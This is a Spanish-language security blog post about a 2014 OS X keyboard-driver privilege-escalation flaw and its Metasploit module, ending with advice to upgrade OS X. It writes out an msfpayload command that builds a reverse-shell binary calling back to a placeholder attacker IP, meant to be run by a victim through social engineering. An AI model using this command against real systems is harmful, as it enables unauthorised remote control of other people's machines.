Hoy en Seguridad Apple hablamos de una vulnerabilidad que se publicó en Diciembre de 2014 y que permitía al atacante escalar privilegios en el sistema. La vulnerabilidad se aprovecha de un fallo en el driver del teclado, y a día de hoy existe un módulo implementado en Metasploit.Ya hemos visto en otras ocasiones formas en las que un atacante puede apoderarse de nuestro Mac, por ejemplo mediante la ejecución de un binario el cual devolvía una sesión remota.Por ejemplo, podemos llevar a cabo esta acción con la herramienta msfpayload, mediante la ejecución de msfpayload osx/x86/shell_reverse_tcp LHOST=[dirección IP atacante] LPORT=[puerto atacante] X y redireccionamos a un fichero. Una vez que un usuario ejecute dicho binario, ya sea de alguna manera mediante las artes de la ingeniería social, obtendremos una shell en nuestro Mac. ¿Qué usuario somos? Realmente seremos el mismo usuario con el que estemos conectados.
 |
| Figura 1: msfpayload generando un binario en OS X |
Según se puede ver en la inicialización del módulo, dónde podemos ver información sobre a qué sistemas afecta el exploit, podemos leer versión 10.9.5 y, en teoría, versiones previas de OS X. Como puede leerse en la imagen, la vulnerabilidad permitiendo realizar un bypass y escalar privilegio dentro del sistema.
 |
| Figura 2: Descripción de la vulnerabilidad |
La función check y exploit del módulo permiten verificar la existencia de una vulnerabilidad y la posibilidad de explotarla. Generalmente, la función check utiliza las versiones de los productos para verificar si el software es vulnerable o no, aunque en algunas ocasiones podemos encontrar que se realiza alguna acción ofensiva para chequear la vulnerabilidad.
 |
| Figura 3: Check y Exploit |
La recomendación es actualizar el sistema operativo, ya que estar por debajo de la versión 10.10 de OS X pone en peligro al equipo. Es cierto que en comparación con otros sistemas operativos del mercado, no hay un número de vulnerabilidades tan grandes como otros con mayor cuota de mercado, pero estos exploits que van apareciendo son ejemplos de fallos de seguridad que van apareciendo cada día en el mundo de la manzana.
No hay comentarios:
Publicar un comentario